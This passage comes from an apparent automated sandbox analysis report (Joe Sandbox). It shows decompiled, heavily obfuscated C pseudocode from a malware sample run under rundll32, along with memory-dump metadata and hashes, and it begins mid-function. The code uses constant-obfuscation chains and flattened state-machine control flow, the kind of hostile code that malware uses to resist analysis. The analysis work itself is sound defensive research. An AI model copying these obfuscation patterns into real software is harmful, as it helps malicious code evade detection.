                                                                                                                    				_v96 = _v96 ^ 0x00000003;
                                                                                                                    				_v56 = 0xab09eb;
                                                                                                                    				_v56 = _v56 | 0x7e070137;
                                                                                                                    				_v56 = _v56 ^ 0x7eaf09ff;
                                                                                                                    				_v80 = 0xa0f766;
                                                                                                                    				_v80 = _v80 | 0xafeefcb7;
                                                                                                                    				_v80 = _v80 ^ 0xafeefff7;
                                                                                                                    				_v48 = 0xf26de0;
                                                                                                                    				_v48 = _v48 + 0xffff1ff1;
                                                                                                                    				_v48 = _v48 ^ 0x00f18dd1;
                                                                                                                    				_v76 = 0x20d89d;
                                                                                                                    				_v76 = _v76 + 0xffff51c8;
                                                                                                                    				_v76 = _v76 | 0xd50d8457;
                                                                                                                    				_v76 = _v76 ^ 0xd52cfd33;
                                                                                                                    				_v136 = 0x1fce72;
                                                                                                                    				_v136 = _v136 >> 0xe;
                                                                                                                    				_v136 = _v136 | 0xd51e44d2;
                                                                                                                    				_t331 = 7;
                                                                                                                    				_v136 = _v136 / _t331;
                                                                                                                    				_v136 = _v136 ^ 0x1e7b1fff;
                                                                                                                    				_t379 = 0x1e2498b;
                                                                                                                    				_v92 = 0x2fa0bb;
                                                                                                                    				_v92 = _v92 >> 7;
                                                                                                                    				_v92 = _v92 << 1;
                                                                                                                    				_v92 = _v92 ^ 0x0000a534;
                                                                                                                    				_v52 = 0x3913b;
                                                                                                                    				_t332 = 0x4f;
                                                                                                                    				_v52 = _v52 / _t332;
                                                                                                                    				_v52 = _v52 ^ 0x00068b65;
                                                                                                                    				_v104 = 0xfffd78;
                                                                                                                    				_v104 = _v104 | 0x3b05e9e1;
                                                                                                                    				_v104 = _v104 + 0x741e;
                                                                                                                    				_v104 = _v104 ^ 0x7591a7da;
                                                                                                                    				_v104 = _v104 ^ 0x4990882f;
                                                                                                                    				_v84 = 0xe3d15a;
                                                                                                                    				_v84 = _v84 << 8;
                                                                                                                    				_v84 = _v84 ^ 0xbeb387df;
                                                                                                                    				_v84 = _v84 ^ 0x5d62ae1e;
                                                                                                                    				_v24 = 0xb3d42d;
                                                                                                                    				_v24 = _v24 | 0x6ee5a57e;
                                                                                                                    				_v24 = _v24 ^ 0x6efe8c67;
                                                                                                                    				_v60 = 0x6708ad;
                                                                                                                    				_v60 = _v60 + 0xd3fd;
                                                                                                                    				_v60 = _v60 ^ 0x0061923e;
                                                                                                                    				_v128 = 0x5551d4;
                                                                                                                    				_t333 = 0x50;
                                                                                                                    				_v128 = _v128 / _t333;
                                                                                                                    				_t334 = 0x7a;
                                                                                                                    				_v128 = _v128 / _t334;
                                                                                                                    				_t335 = 0x7e;
                                                                                                                    				_v128 = _v128 * 0x46;
                                                                                                                    				_v128 = _v128 ^ 0x000c63e9;
                                                                                                                    				_v28 = 0xd668f8;
                                                                                                                    				_v28 = _v28 << 0x10;
                                                                                                                    				_v28 = _v28 ^ 0x68f34519;
                                                                                                                    				_v112 = 0x194a18;
                                                                                                                    				_v112 = _v112 / _t335;
                                                                                                                    				_v112 = _v112 | 0xa7c33fbe;
                                                                                                                    				_t336 = 0x65;
                                                                                                                    				_v112 = _v112 / _t336;
                                                                                                                    				_v112 = _v112 ^ 0x01a285cf;
                                                                                                                    				_v44 = 0xc79794;
                                                                                                                    				_v44 = _v44 ^ 0x35aba003;
                                                                                                                    				_v44 = _v44 ^ 0x356e5b19;
                                                                                                                    				_v140 = 0x380362;
                                                                                                                    				_t337 = 0x79;
                                                                                                                    				_v140 = _v140 * 5;
                                                                                                                    				_v140 = _v140 ^ 0x1d7b2daf;
                                                                                                                    				_v140 = _v140 + 0x590f;
                                                                                                                    				_v140 = _v140 ^ 0x1c6cd8ab;
                                                                                                                    				_v120 = 0x1c8328;
                                                                                                                    				_v120 = _v120 / _t337;
                                                                                                                    				_t338 = 0xa;
                                                                                                                    				_v120 = _v120 / _t338;
                                                                                                                    				_v120 = _v120 | 0x9d020d0f;
                                                                                                                    				_v120 = _v120 ^ 0x9d02076d;
                                                                                                                    				_v124 = 0x55cbd6;
                                                                                                                    				_v124 = _v124 >> 9;
                                                                                                                    				_v124 = _v124 >> 0xc;
                                                                                                                    				_v124 = _v124 >> 6;
                                                                                                                    				_v124 = _v124 ^ 0x000fb83a;
                                                                                                                    				_v132 = 0xf0ac8c;
                                                                                                                    				_v132 = _v132 | 0x3804c269;
                                                                                                                    				_v132 = _v132 >> 1;
                                                                                                                    				_v132 = _v132 + 0xffff8da8;
                                                                                                                    				_v132 = _v132 ^ 0x1c781e64;
                                                                                                                    				_v88 = 0x7992e8;
                                                                                                                    				_v88 = _v88 | 0xba3027fa;
                                                                                                                    				_v88 = _v88 >> 9;
                                                                                                                    				_v88 = _v88 ^ 0x0051fda0;
                                                                                                                    				_v36 = 0x7aefbd;
                                                                                                                    				_v36 = _v36 + 0xfffff4eb;
                                                                                                                    				_v36 = _v36 ^ 0x0078a7fc;
                                                                                                                    				_v40 = 0xf56b46;
                                                                                                                    				_v40 = _v40 + 0xffff9ce0;
                                                                                                                    				_v40 = _v40 ^ 0x00fe48d4;
                                                                                                                    				_v108 = 0x27569f;
                                                                                                                    				_v108 = _v108 + 0x2c0a;
                                                                                                                    				_v108 = _v108 ^ 0xb442ac8c;
                                                                                                                    				_v108 = _v108 ^ 0xdc856b2a;
                                                                                                                    				_v108 = _v108 ^ 0x68e3c0da;
                                                                                                                    				_v116 = 0xbcba21;
                                                                                                                    				_v116 = _v116 << 0xd;
                                                                                                                    				_v116 = _v116 << 8;
                                                                                                                    				_v116 = _v116 >> 6;
                                                                                                                    				_v116 = _v116 ^ 0x011b605a;
                                                                                                                    				_v32 = 0x87c31e;
                                                                                                                    				_v32 = _v32 ^ 0x05bc26b1;
                                                                                                                    				_v32 = _v32 ^ 0x05363b16;
                                                                                                                    				_v100 = 0x4be1cd;
                                                                                                                    				_v100 = _v100 + 0xffff13dd;
                                                                                                                    				_v100 = _v100 | 0xdbf19b4f;
                                                                                                                    				_v100 = _v100 >> 7;
                                                                                                                    				_v100 = _v100 ^ 0x01b90151;
                                                                                                                    				_v64 = 0xb1223e;
                                                                                                                    				_v64 = _v64 | 0xb1fef6fe;
                                                                                                                    				_v64 = _v64 ^ 0xb1f65c82;
                                                                                                                    				_v72 = 0x9ef2a7;
                                                                                                                    				_v72 = _v72 * 0x66;
                                                                                                                    				_v72 = _v72 + 0xffffefd1;
                                                                                                                    				_v72 = _v72 ^ 0x3f51caaf;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					while(1) {
                                                                                                                    						_t309 = 0x546d98;
                                                                                                                    						do {
                                                                                                                    							L3:
                                                                                                                    							if(_t379 == _t309) {
                                                                                                                    								_t310 =  *0x353e00; // 0x0
                                                                                                                    								_t339 = _v56;
                                                                                                                    								_t311 = E00340DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
                                                                                                                    								_t383 =  &(_t383[6]);
                                                                                                                    								__eflags = _t311 - _v80;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									_t379 = 0x64eb485;
                                                                                                                    									goto L14;
                                                                                                                    								} else {
                                                                                                                    									_t379 = 0xb6ab68a;
                                                                                                                    									_t329 = 1;
                                                                                                                    									goto L1;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t379 == 0x19763e8) {
                                                                                                                    									_push(_v128);
                                                                                                                    									_push(_v60);
                                                                                                                    									__eflags = E00339462(E0034DCF7(_v24, 0x3317f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
                                                                                                                    									_t339 = _v140;
                                                                                                                    									_t379 =  ==  ? 0x546d98 : 0x64eb485;
                                                                                                                    									E0033A8B0(_t339, _t313, _v120);
                                                                                                                    									_t383 =  &(_t383[8]);
                                                                                                                    									L14:
                                                                                                                    									_t369 =  *0x353e00; // 0x0
                                                                                                                    									_t309 = 0x546d98;
                                                                                                                    									goto L15;
                                                                                                                    								} else {
                                                                                                                    									if(_t379 == 0x1e2498b) {
                                                                                                                    										_push(_t339);
                                                                                                                    										_push(_t339);
                                                                                                                    										_t373 = 0x28;
                                                                                                                    										_t321 = E00337FF2(_t373);
                                                                                                                    										 *0x353e00 = _t321;
                                                                                                                    										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
                                                                                                                    										_t374 =  *0x353e00; // 0x0
                                                                                                                    										_t325 = E00337FF2( *((intOrPtr*)(_t374 + 0x14)));
                                                                                                                    										_t369 =  *0x353e00; // 0x0
                                                                                                                    										_t379 = 0x19763e8;
                                                                                                                    										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
                                                                                                                    										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
                                                                                                                    										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
                                                                                                                    										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
                                                                                                                    										 *(_t369 + 4) = _t339;
                                                                                                                    										_t309 = 0x546d98;
                                                                                                                    										continue;
                                                                                                                    									} else {
                                                                                                                    										if(_t379 == 0x64eb485) {
                                                                                                                    											E00348519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
                                                                                                                    											E00348519(_v64, _v72,  *0x353e00);
                                                                                                                    										} else {
                                                                                                                    											if(_t379 != 0xb6ab68a) {
                                                                                                                    												goto L15;
                                                                                                                    											} else {
                                                                                                                    												E0033957D(_v20, _v40, _v108, _v48, _v116);
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							L18:
                                                                                                                    							return _t329;
                                                                                                                    							L15:
                                                                                                                    							__eflags = _t379 - 0xfde45c5;
                                                                                                                    						} while (__eflags != 0);
                                                                                                                    						goto L18;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ,
                                                                                                                    • API String ID: 0-2314114710
                                                                                                                    • Opcode ID: 5c1c654f752f3d0bc4d647c7cc749fb50f06e32ac625fc6b584f3f215edbe33a
                                                                                                                    • Instruction ID: 3582d5f2ce6214125900a425a6fa785355ba8daec0490827537dd7ddb94033ae
                                                                                                                    • Opcode Fuzzy Hash: 5c1c654f752f3d0bc4d647c7cc749fb50f06e32ac625fc6b584f3f215edbe33a
                                                                                                                    • Instruction Fuzzy Hash: 63E141726083809FD369CF25D58A50BBBF1FBC4748F60891DF69A8A260C7B1D949CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Iconic
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 110040809-0
                                                                                                                    • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                    • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                    • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                    • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00349EEC() {
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				char _v16;
                                                                                                                    				char _v20;
                                                                                                                    				char _v24;
                                                                                                                    				char _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _t207;
                                                                                                                    				intOrPtr _t209;
                                                                                                                    				intOrPtr _t212;
                                                                                                                    				intOrPtr _t214;
                                                                                                                    				intOrPtr _t218;
                                                                                                                    				void* _t219;
                                                                                                                    				signed int _t221;
                                                                                                                    				signed int _t222;
                                                                                                                    				signed int _t223;
                                                                                                                    				signed int _t224;
                                                                                                                    				signed int _t225;
                                                                                                                    				signed int _t257;
                                                                                                                    				void* _t259;
                                                                                                                    				char _t263;
                                                                                                                    				void* _t264;
                                                                                                                    				void* _t266;
                                                                                                                    
                                                                                                                    				_v64 = 0xd7ee0e;
                                                                                                                    				_t257 = 0x22;
                                                                                                                    				_v64 = _v64 / _t257;
                                                                                                                    				_v64 = _v64 + 0x89a9;
                                                                                                                    				_t219 = 0;
                                                                                                                    				_v64 = _v64 ^ 0x0000b335;
                                                                                                                    				_t259 = 0xb83ebc6;
                                                                                                                    				_v96 = 0xf5dfb6;
                                                                                                                    				_v96 = _v96 >> 6;
                                                                                                                    				_t221 = 0x26;
                                                                                                                    				_v96 = _v96 / _t221;
                                                                                                                    				_t222 = 0x2d;
                                                                                                                    				_v96 = _v96 * 0x58;
                                                                                                                    				_v96 = _v96 ^ 0x000b9251;
                                                                                                                    				_v60 = 0xd70e95;
                                                                                                                    				_v60 = _v60 >> 9;
                                                                                                                    				_v60 = _v60 + 0xffffe8b9;
                                                                                                                    				_v60 = _v60 ^ 0x00062b78;
                                                                                                                    				_v44 = 0xb641ac;
                                                                                                                    				_v44 = _v44 / _t222;
                                                                                                                    				_v44 = _v44 ^ 0x0002d028;
                                                                                                                    				_v52 = 0xbf8457;
                                                                                                                    				_t223 = 0x5d;
                                                                                                                    				_v52 = _v52 / _t223;
                                                                                                                    				_v52 = _v52 | 0xbb7661a2;
                                                                                                                    				_v52 = _v52 ^ 0xbb710206;
                                                                                                                    				_v80 = 0x47b11a;
                                                                                                                    				_v80 = _v80 ^ 0xc2c4229c;
                                                                                                                    				_t224 = 0x18;
                                                                                                                    				_v80 = _v80 / _t224;
                                                                                                                    				_v80 = _v80 + 0xffff1c96;
                                                                                                                    				_v80 = _v80 ^ 0x08184a4c;
                                                                                                                    				_v36 = 0x40dca8;
                                                                                                                    				_v36 = _v36 + 0x3144;
                                                                                                                    				_v36 = _v36 ^ 0x004d2780;
                                                                                                                    				_v40 = 0xec5297;
                                                                                                                    				_v40 = _v40 * 0x45;
                                                                                                                    				_v40 = _v40 ^ 0x3fbac2f2;
                                                                                                                    				_v72 = 0x18b121;
                                                                                                                    				_v72 = _v72 >> 1;
                                                                                                                    				_v72 = _v72 * 0x1e;
                                                                                                                    				_v72 = _v72 + 0xfd79;
                                                                                                                    				_v72 = _v72 ^ 0x0173ec5f;
                                                                                                                    				_v76 = 0xd8cc67;
                                                                                                                    				_v76 = _v76 >> 2;
                                                                                                                    				_v76 = _v76 >> 0xd;
                                                                                                                    				_v76 = _v76 * 0x23;
                                                                                                                    				_v76 = _v76 ^ 0x000d42f3;
                                                                                                                    				_v88 = 0x5f1bd9;
                                                                                                                    				_v88 = _v88 + 0x89b3;
                                                                                                                    				_v88 = _v88 ^ 0xee5f73f3;
                                                                                                                    				_v88 = _v88 ^ 0xfa82a5ad;
                                                                                                                    				_v88 = _v88 ^ 0x14801a76;
                                                                                                                    				_v92 = 0x778c42;
                                                                                                                    				_t225 = 0x6d;
                                                                                                                    				_v92 = _v92 * 0x69;
                                                                                                                    				_v92 = _v92 << 0xb;
                                                                                                                    				_v92 = _v92 | 0xba472be1;
                                                                                                                    				_v92 = _v92 ^ 0xfe7d7315;
                                                                                                                    				_v56 = 0x5dd318;
                                                                                                                    				_v56 = _v56 / _t257;
                                                                                                                    				_v56 = _v56 << 0xc;
                                                                                                                    				_v56 = _v56 ^ 0x2c2721c6;
                                                                                                                    				_v84 = 0xd870dc;
                                                                                                                    				_v84 = _v84 >> 0x10;
                                                                                                                    				_v84 = _v84 | 0x1345b487;
                                                                                                                    				_v84 = _v84 * 0x5a;
                                                                                                                    				_v84 = _v84 ^ 0xc68bf031;
                                                                                                                    				_v48 = 0x9a419e;
                                                                                                                    				_v48 = _v48 | 0xfa3afde2;
                                                                                                                    				_v48 = _v48 ^ 0xfabdbed6;
                                                                                                                    				_v32 = 0x7a1ab;
                                                                                                                    				_v32 = _v32 / _t225;
                                                                                                                    				_v32 = _v32 ^ 0x000f5e95;
                                                                                                                    				_v68 = 0x67bbab;
                                                                                                                    				_v68 = _v68 + 0xffffccf8;
                                                                                                                    				_v68 = _v68 ^ 0x5c1ded32;
                                                                                                                    				_v68 = _v68 << 0xd;
                                                                                                                    				_v68 = _v68 ^ 0x4cb92f41;
                                                                                                                    				_t263 = _v28;
                                                                                                                    				_t258 = _v28;
                                                                                                                    				goto L1;
                                                                                                                    				do {
                                                                                                                    					while(1) {
                                                                                                                    						L1:
                                                                                                                    						_t266 = _t259 - 0xc23b37f;
                                                                                                                    						if(_t266 > 0) {
                                                                                                                    							break;
                                                                                                                    						}
                                                                                                                    						if(_t266 == 0) {
                                                                                                                    							E00348519(_v56, _v84, _v24);
                                                                                                                    							_t259 = 0xdb1153f;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t259 == 0xab8c2) {
                                                                                                                    							_t209 =  *0x353e10; // 0x0
                                                                                                                    							E00338ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
                                                                                                                    							_t212 =  *0x353e10; // 0x0
                                                                                                                    							_t234 = _v16;
                                                                                                                    							_t264 = _t264 + 0xc;
                                                                                                                    							_t219 = 1;
                                                                                                                    							_t259 = 0xc23b37f;
                                                                                                                    							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t259 == 0x26dca52) {
                                                                                                                    							_t234 = _v96;
                                                                                                                    							_t214 = E0033A9CE(_v96, _t263,  &_v28, _v60, _v44);
                                                                                                                    							_t258 = _t214;
                                                                                                                    							_t264 = _t264 + 0xc;
                                                                                                                    							if(_t214 == 0) {
                                                                                                                    								goto L22;
                                                                                                                    							}
                                                                                                                    							_t259 = 0xe747a68;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t259 == 0xa9b692f) {
                                                                                                                    							_t263 = E0033F899(_t234);
                                                                                                                    							_t259 = 0x26dca52;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t259 != 0xb83ebc6) {
                                                                                                                    							goto L21;
                                                                                                                    						} else {
                                                                                                                    							_t259 = 0xa9b692f;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					if(_t259 == 0xdb1153f) {
                                                                                                                    						E00334E7D(_v48, _v32, _t258, _v68);
                                                                                                                    						_t259 = 0xdb3b1d3;
                                                                                                                    						goto L21;
                                                                                                                    					}
                                                                                                                    					if(_t259 == 0xe566670) {
                                                                                                                    						_t207 = E0034894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
                                                                                                                    						_t264 = _t264 + 0x10;
                                                                                                                    						asm("sbb esi, esi");
                                                                                                                    						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
                                                                                                                    						goto L1;
                                                                                                                    					}
                                                                                                                    					if(_t259 != 0xe747a68) {
                                                                                                                    						goto L21;
                                                                                                                    					}
                                                                                                                    					_t259 = 0xdb1153f;
                                                                                                                    					if(_v28 > 2) {
                                                                                                                    						_t218 = E00334346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
                                                                                                                    						_v24 = _t218;
                                                                                                                    						_pop(_t234);
                                                                                                                    						if(_t218 != 0) {
                                                                                                                    							_t259 = 0xe566670;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					goto L1;
                                                                                                                    					L21:
                                                                                                                    				} while (_t259 != 0xdb3b1d3);
                                                                                                                    				L22:
                                                                                                                    				return _t219;
                                                                                                                    			}











































                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: D1
                                                                                                                    • API String ID: 0-2215811268
                                                                                                                    • Opcode ID: cc0b683ca5d72fc1ae4fb8f00839fbc30f4953fa0d76bd4ededc6f2f3da72f64
                                                                                                                    • Instruction ID: a507dc510ced188470a03b7d3c857e3cffb457fd64e5d8fa0ca348458c9959f9
                                                                                                                    • Opcode Fuzzy Hash: cc0b683ca5d72fc1ae4fb8f00839fbc30f4953fa0d76bd4ededc6f2f3da72f64
                                                                                                                    • Instruction Fuzzy Hash: 63A163729083008FC359CF65C58940BFBE2BBC4358F54892EF5A99B220D7B5DA498F87
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E0034BB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				void* _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				char _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				unsigned int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				void* _t138;
                                                                                                                    				intOrPtr _t161;
                                                                                                                    				void* _t162;
                                                                                                                    				void* _t164;
                                                                                                                    				signed int _t181;
                                                                                                                    				signed int _t182;
                                                                                                                    				signed int _t183;
                                                                                                                    				void* _t185;
                                                                                                                    				signed int* _t189;
                                                                                                                    
                                                                                                                    				_t162 = __ecx;
                                                                                                                    				_push(1);
                                                                                                                    				_push(1);
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t138);
                                                                                                                    				_v16 = 0xdfc885;
                                                                                                                    				_t189 =  &(( &_v76)[8]);
                                                                                                                    				asm("stosd");
                                                                                                                    				_t185 = 0;
                                                                                                                    				_t164 = 0xcc97672;
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				_v32 = 0x60c2fa;
                                                                                                                    				_v32 = _v32 >> 3;
                                                                                                                    				_v32 = _v32 ^ 0x00046f58;
                                                                                                                    				_v76 = 0xb548f0;
                                                                                                                    				_v76 = _v76 >> 0xc;
                                                                                                                    				_t181 = 0xc;
                                                                                                                    				_v76 = _v76 * 0x3c;
                                                                                                                    				_v76 = _v76 + 0xffff64d0;
                                                                                                                    				_v76 = _v76 ^ 0x0001fd54;
                                                                                                                    				_v52 = 0x15927a;
                                                                                                                    				_v52 = _v52 / _t181;
                                                                                                                    				_v52 = _v52 ^ 0x000151ae;
                                                                                                                    				_v56 = 0xd6ed9;
                                                                                                                    				_t182 = 0x1a;
                                                                                                                    				_v56 = _v56 * 0x3f;
                                                                                                                    				_v56 = _v56 + 0xfffffbb4;
                                                                                                                    				_v56 = _v56 ^ 0x0345d46e;
                                                                                                                    				_v64 = 0xba2b53;
                                                                                                                    				_v64 = _v64 * 0x6d;
                                                                                                                    				_v64 = _v64 ^ 0x73d6d9cf;
                                                                                                                    				_v64 = _v64 * 0x31;
                                                                                                                    				_v64 = _v64 ^ 0x981330b4;
                                                                                                                    				_v60 = 0x269f8;
                                                                                                                    				_v60 = _v60 >> 5;
                                                                                                                    				_v60 = _v60 + 0xffffb859;
                                                                                                                    				_v60 = _v60 ^ 0xfff00afd;
                                                                                                                    				_v68 = 0xfd9147;
                                                                                                                    				_v68 = _v68 ^ 0x8de1643f;
                                                                                                                    				_v68 = _v68 / _t182;
                                                                                                                    				_v68 = _v68 >> 0xf;
                                                                                                                    				_v68 = _v68 ^ 0x000df039;
                                                                                                                    				_v72 = 0x5def36;
                                                                                                                    				_v72 = _v72 | 0xd620e1c7;
                                                                                                                    				_v72 = _v72 + 0xd307;
                                                                                                                    				_t183 = 0x48;
                                                                                                                    				_v72 = _v72 / _t183;
                                                                                                                    				_v72 = _v72 ^ 0x02f0e4dc;
                                                                                                                    				_v24 = 0xf7704c;
                                                                                                                    				_v24 = _v24 + 0x27dd;
                                                                                                                    				_v24 = _v24 ^ 0x00ff74b2;
                                                                                                                    				_v28 = 0x151ed9;
                                                                                                                    				_v28 = _v28 * 0x48;
                                                                                                                    				_v28 = _v28 ^ 0x05f046e2;
                                                                                                                    				_v36 = 0xddc4df;
                                                                                                                    				_v36 = _v36 >> 0xf;
                                                                                                                    				_v36 = _v36 | 0x7f83127d;
                                                                                                                    				_v36 = _v36 ^ 0x7f8e5ab1;
                                                                                                                    				_v40 = 0x29fd7f;
                                                                                                                    				_v40 = _v40 >> 7;
                                                                                                                    				_v40 = _v40 | 0x8d3b2756;
                                                                                                                    				_v40 = _v40 ^ 0x8d37b79a;
                                                                                                                    				_v44 = 0x8dc5a8;
                                                                                                                    				_v44 = _v44 * 0x63;
                                                                                                                    				_v44 = _v44 >> 4;
                                                                                                                    				_v44 = _v44 ^ 0x036b3557;
                                                                                                                    				_v48 = 0xd61f7e;
                                                                                                                    				_v48 = _v48 | 0xd43d52c3;
                                                                                                                    				_v48 = _v48 + 0xa376;
                                                                                                                    				_v48 = _v48 ^ 0xd504b7b0;
                                                                                                                    				_t184 = _v20;
                                                                                                                    				while(_t164 != 0x2524be6) {
                                                                                                                    					if(_t164 == 0xcc97672) {
                                                                                                                    						_t164 = 0xe41debb;
                                                                                                                    						continue;
                                                                                                                    					} else {
                                                                                                                    						if(_t164 == 0xdd773d9) {
                                                                                                                    							if(E0034D8EC(_v52, _v56,  &_v20, _t184) != 0) {
                                                                                                                    								_t164 = 0xe01b1ec;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							if(_t164 == 0xe01b1ec) {
                                                                                                                    								E00350AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
                                                                                                                    								_t189 =  &(_t189[0xa]);
                                                                                                                    								_t164 = 0x2524be6;
                                                                                                                    								_t185 =  !=  ? 1 : _t185;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t164 != 0xe41debb) {
                                                                                                                    									L13:
                                                                                                                    									if(_t164 != 0x78a313b) {
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									_t161 = E00333DE2(_t164);
                                                                                                                    									_t184 = _t161;
                                                                                                                    									if(_t161 != 0xffffffff) {
                                                                                                                    										_t164 = 0xdd773d9;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					return _t185;
                                                                                                                    				}
                                                                                                                    				E00341E67(_v36, _v40, _v44, _v48, _v20);
                                                                                                                    				_t189 =  &(_t189[3]);
                                                                                                                    				_t164 = 0x78a313b;
                                                                                                                    				goto L13;
                                                                                                                    			}

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
